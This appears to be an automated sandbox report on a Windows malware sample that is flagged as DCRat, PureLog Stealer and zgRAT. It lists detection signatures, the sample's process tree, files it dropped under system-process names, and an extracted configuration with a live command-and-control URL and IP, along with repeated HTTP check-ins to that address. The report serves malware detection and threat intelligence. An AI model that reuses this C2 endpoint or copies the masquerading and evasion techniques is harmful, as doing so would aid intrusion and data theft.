Edit tour

Windows Analysis Report
eu6OEBpBCI.exe

Overview

General Information

Sample name:	eu6OEBpBCI.exe renamed because original name is a hash value
Original sample name:	17d1a3b2d87457f2492926349fae2417.exe
Analysis ID:	1571109
MD5:	17d1a3b2d87457f2492926349fae2417
SHA1:	5ffdb9a82faf2fc9dda683dc026e10376bc5a7bc
SHA256:	a15debb35819618dde10abc793552e6addf91baf38d2025c274d84fdcedb97fa
Tags:	exeZyklonuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Suspicious Program Location with Network Connections

Sigma detected: System File Execution Location Anomaly

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Dllhost Internet Connection

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

eu6OEBpBCI.exe (PID: 5928 cmdline: "C:\Users\user\Desktop\eu6OEBpBCI.exe" MD5: 17D1A3B2D87457F2492926349FAE2417)

cmd.exe (PID: 5572 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VE9VyBa20L.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3180 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 2932 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

dllhost.exe (PID: 6924 cmdline: "C:\Users\Public\Libraries\dllhost.exe" MD5: 17D1A3B2D87457F2492926349FAE2417)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://91.227.41.9/imagePipepolldletemp", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
eu6OEBpBCI.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
eu6OEBpBCI.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\Public\Libraries\dllhost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\Public\Libraries\dllhost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\fontdrvhost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\fontdrvhost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\fontdrvhost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\fontdrvhost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\fontdrvhost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\fontdrvhost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.4103094451.0000000003281000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.4103094451.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000000.1642613306.00000000004E2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.4103094451.000000000342D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1689492935.0000000012ED7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: eu6OEBpBCI.exe PID: 5928	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dllhost.exe PID: 6924	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.eu6OEBpBCI.exe.4e0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.eu6OEBpBCI.exe.4e0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\dllhost.exe" , CommandLine: "C:\Users\Public\Libraries\dllhost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\dllhost.exe, NewProcessName: C:\Users\Public\Libraries\dllhost.exe, OriginalFileName: C:\Users\Public\Libraries\dllhost.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VE9VyBa20L.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5572, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\Libraries\dllhost.exe" , ProcessId: 6924, ProcessName: dllhost.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\eu6OEBpBCI.exe, ProcessId: 5928, TargetFilename: C:\Recovery\fontdrvhost.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 91.227.41.9, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\dllhost.exe, Initiated: true, ProcessId: 6924, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\Public\Libraries\dllhost.exe" , CommandLine: "C:\Users\Public\Libraries\dllhost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\dllhost.exe, NewProcessName: C:\Users\Public\Libraries\dllhost.exe, OriginalFileName: C:\Users\Public\Libraries\dllhost.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VE9VyBa20L.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5572, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\Libraries\dllhost.exe" , ProcessId: 6924, ProcessName: dllhost.exe

Sigma detected: Dllhost Internet Connection

Source: Network Connection

Author: bartblaze: Data: DestinationIp: 91.227.41.9, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\dllhost.exe, Initiated: true, ProcessId: 6924, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T00:27:12.843013+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49730	91.227.41.9	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: eu6OEBpBCI.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\RGKyyyvv.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\FnLRHIfV.log	Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\Public\Libraries\dllhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\fontdrvhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\VE9VyBa20L.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\GzproQCn.log	Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Users\user\Desktop\FCNjSRns.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 00000000.00000002.1689492935.0000000012ED7000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://91.227.41.9/imagePipepolldletemp", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\7-Zip\Lang\aVIegkftDeblliEdgtUahRSaMtI.exe	ReversingLabs: Detection: 73%
Source: C:\Recovery\fontdrvhost.exe	ReversingLabs: Detection: 73%
Source: C:\Users\Public\Libraries\dllhost.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\DOJbgDru.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\FCNjSRns.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\GzproQCn.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\IYriOWqO.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\KpfivNCg.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\MRnySouc.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\PTahnXzX.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\PVfhrllC.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\QALqtMNE.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\TYzyfqIO.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\VVaGAqXJ.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\XxiWXROF.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\YwOfwePf.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\bYXvUFHb.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\gsyeVgYo.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\hZjnbUmV.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\haXUgXfM.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\jzvnrySk.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\lQNLnUfF.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\tCFTCxVs.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\ygASuHSj.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\ypXSetlg.log	ReversingLabs: Detection: 25%
Source: C:\Windows\Logs\WindowsUpdate\aVIegkftDeblliEdgtUahRSaMtI.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: eu6OEBpBCI.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\RGKyyyvv.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\FnLRHIfV.log	Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\dllhost.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	Joe Sandbox ML: detected
Source: C:\Recovery\fontdrvhost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\IYriOWqO.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\WJeOmDSH.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AHMSLlxy.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\TYzyfqIO.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\PTahnXzX.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\FCNjSRns.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\PVfhrllC.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: eu6OEBpBCI.exe

Joe Sandbox ML: detected

Source: eu6OEBpBCI.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Directory created: C:\Program Files\7-Zip\Lang\aVIegkftDeblliEdgtUahRSaMtI.exe			Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Directory created: C:\Program Files\7-Zip\Lang\74cb7468389f91			Jump to behavior

Source: eu6OEBpBCI.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		0_2_00007FFD9B92B73D
Source: C:\Users\Public\Libraries\dllhost.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		5_2_00007FFD9BB2B6E5

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 91.227.41.9:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\Public\Libraries\dllhost.exe

Network Connect: 91.227.41.9 80

Jump to behavior

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL

Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1856Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JfPZs2UEFI3gnVXFX8zJCzj4G5RhJ1J6akUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 188114Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1836Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
